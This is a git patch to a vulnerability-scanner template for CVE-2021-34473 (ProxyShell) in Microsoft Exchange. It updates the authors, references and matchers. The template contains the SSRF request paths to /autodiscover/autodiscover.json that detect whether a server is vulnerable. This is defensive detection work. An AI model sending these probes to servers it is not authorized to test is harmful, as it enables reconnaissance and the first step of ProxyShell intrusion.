From c537e2ccd4c9ed0c91a965012f52c110993badc7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 22:09:42 +0530 Subject: [PATCH] minor update --- cves/2021/CVE-2021-34473.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index d68b694bb0..22b856d488 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -2,19 +2,18 @@ id: CVE-2021-34473 info: name: Exchange Server SSRF (ProxyShell) - author: arcc + author: arcc,intx0x80,dwisiswant0,r3dg33k severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. reference: | - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - - https://www.youtube.com/watch?v=FC6iHw258RI - - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange requests: - method: GET - redirects: true path: - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' @@ -22,6 +21,7 @@ requests: matchers: - type: word part: body + condition: or words: - - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException - - Exchange MAPI/HTTP Connectivity Endpoint \ No newline at end of file + - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" + - "Exchange MAPI/HTTP Connectivity Endpoint" \ No newline at end of file